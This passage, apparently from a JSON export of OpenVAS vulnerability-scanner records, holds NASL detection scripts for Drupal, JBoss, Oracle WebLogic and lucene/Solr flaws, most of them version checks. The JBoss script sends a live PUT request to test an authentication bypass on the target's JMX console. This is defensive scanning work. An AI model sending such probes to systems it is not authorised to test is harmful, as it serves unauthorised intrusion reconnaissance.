script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. 
This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-12T17:33:15", "description": "JBoss Enterprise Application Platform is prone to multiple\n vulnerabilities, including an information-disclosure issue and\n multiple authentication-bypass issues.", "cvss3": {}, "published": "2010-04-28T00:00:00", "type": "openvas", "title": "JBoss Enterprise Application Platform Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1429", "CVE-2010-1428", "CVE-2010-0738"], "modified": 
"2020-05-08T00:00:00", "id": "OPENVAS:1361412562310100610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100610", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# JBoss Enterprise Application Platform Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100610\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-28 14:05:27 +0200 (Wed, 28 Apr 2010)\");\n script_bugtraq_id(39710);\n script_cve_id(\"CVE-2010-0738\", \"CVE-2010-1428\", \"CVE-2010-1429\");\n script_name(\"JBoss Enterprise Application Platform Multiple Vulnerabilities\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_category(ACT_ATTACK);\n script_family(\"Web Servers\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n 
script_dependencies(\"JBoss_enterprise_aplication_server_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"jboss/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/39710\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit these issues to bypass certain security\n restrictions to obtain sensitive information or gain unauthorized access to the application.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for details.\");\n\n script_tag(name:\"summary\", value:\"JBoss Enterprise Application Platform is prone to multiple\n vulnerabilities, including an information-disclosure issue and\n multiple authentication-bypass issues.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_kb_item( \"jboss/port\" ) )\n exit( 0 );\n\nurl = \"/jmx-console\";\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( ! 
buf || buf =~ \"^HTTP/1\\.[01] [23]00\" )\n exit( 0 );\n\nurl = \"/jmx-console/checkJNDI.jsp\";\nhost = http_host_name( port:port );\n\nreq = string( \"PUT \", url, \" HTTP/1.0\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"\\r\\n\" );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( res =~ \"^HTTP/1\\.[01] 200\" && \"JNDI Check</title>\" >< res && \"JNDI Checking for host\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-29T22:07:15", "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3506", "CVE-2017-5638", "CVE-2016-1181"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310810748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810748\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-5638\", \"CVE-2016-1181\", \"CVE-2017-3506\");\n script_bugtraq_id(96729, 91068, 97884);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-19 14:58:02 +0530 (Wed, 19 Apr 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to some unspecified error in the 'Samples (Struts 2)' and\n 'Web Services' sub-component within Oracle WebLogic Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:12:14", "description": "Michael Stepankin and Olga Barinova discovered a remote code execution\nvulnerability in Apache Solr by exploiting XML External Entity\nprocessing (XXE) in conjunction with use of a Config API add-listener\ncommand to reach the RunExecutableListener class. 
To resolve this\nissue the RunExecutableListener class has been removed and resolving\nof external entities in the CoreParser class disallowed.", "cvss3": {}, "published": "2018-01-22T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for lucene-solr (DLA-1254-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891254", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891254\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-12629\");\n script_name(\"Debian LTS: Security Advisory for lucene-solr (DLA-1254-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-22 00:00:00 +0100 (Mon, 22 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"lucene-solr on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.6.0+dfsg-1+deb7u3.\n\nWe recommend that you upgrade your lucene-solr packages.\");\n\n script_tag(name:\"summary\", value:\"Michael Stepankin and Olga Barinova discovered a remote code execution\nvulnerability in Apache Solr by exploiting XML External Entity\nprocessing (XXE) in conjunction with use of a Config API add-listener\ncommand to reach the RunExecutableListener class. 
To resolve this\nissue the RunExecutableListener class has been removed and resolving\nof external entities in the CoreParser class disallowed.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"liblucene3-contrib-java\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblucene3-java\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblucene3-java-doc\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsolr-java\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"solr-common\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"solr-jetty\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"solr-tomcat\", ver:\"3.6.0+dfsg-1+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-11-02T00:00:00", "type": "openvas", "title": "Fedora Update for lucene FEDORA-2017-005f8f7f7d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873561", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873561", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
gb_fedora_2017_005f8f7f7d_lucene_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene FEDORA-2017-005f8f7f7d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873561\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-02 11:13:52 +0100 (Thu, 02 Nov 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene FEDORA-2017-005f8f7f7d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the 
updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-005f8f7f7d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene\", rpm:\"lucene~5.5.0~5.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for lucene4 FEDORA-2017-195e7ea9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_195e7ea9a8_lucene4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene4 FEDORA-2017-195e7ea9a8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873831\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:48:32 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene4 FEDORA-2017-195e7ea9a8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-195e7ea9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5EMMO4MG6W6IS5Y64EG3N466TKWVWY44\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene4\", rpm:\"lucene4~4.10.4~11.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-11-02T00:00:00", "type": "openvas", "title": "Fedora Update for lucene FEDORA-2017-c7bdf540b4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_c7bdf540b4_lucene_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene FEDORA-2017-c7bdf540b4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873557\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-02 18:05:38 +0530 (Thu, 02 Nov 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene FEDORA-2017-c7bdf540b4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-c7bdf540b4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4VSRNALKTFGMXF7R2WI7KXI3NSLHT7FM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene\", rpm:\"lucene~6.1.0~6.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for lucene4 FEDORA-2017-0929e71b41", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873836", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873836", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0929e71b41_lucene4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene4 FEDORA-2017-0929e71b41\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873836\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:48:27 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene4 FEDORA-2017-0929e71b41\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0929e71b41\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RT6ISHPWQXJPASPQG4K5TNVXTFUEQQ4Q\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene4\", rpm:\"lucene4~4.10.4~11.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P
